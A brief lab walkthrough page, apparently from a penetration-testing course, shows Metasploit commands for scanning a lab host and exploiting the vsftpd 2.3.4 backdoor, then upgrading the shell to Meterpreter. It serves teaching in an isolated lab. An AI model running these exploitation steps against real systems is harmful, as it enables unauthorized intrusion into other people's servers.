🔬FTP - MSF Exploit

Lab 1

🔬 Vulnerable FTP Server

ip -br -c a
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.80.80.3
setg RHOST 192.80.80.3
workspace -a vsftpd2.3.4
  • Perform an nmap scan directly into MSF

db_nmap -sS -sV -O 192.80.80.3
db_nmap -sS -sV -O 192.80.80.3
Metasploit - exploit/unix/ftp/vsftpd_234_backdoor
  • Shell to Meterpreter post exploitation


Last updated

Was this helpful?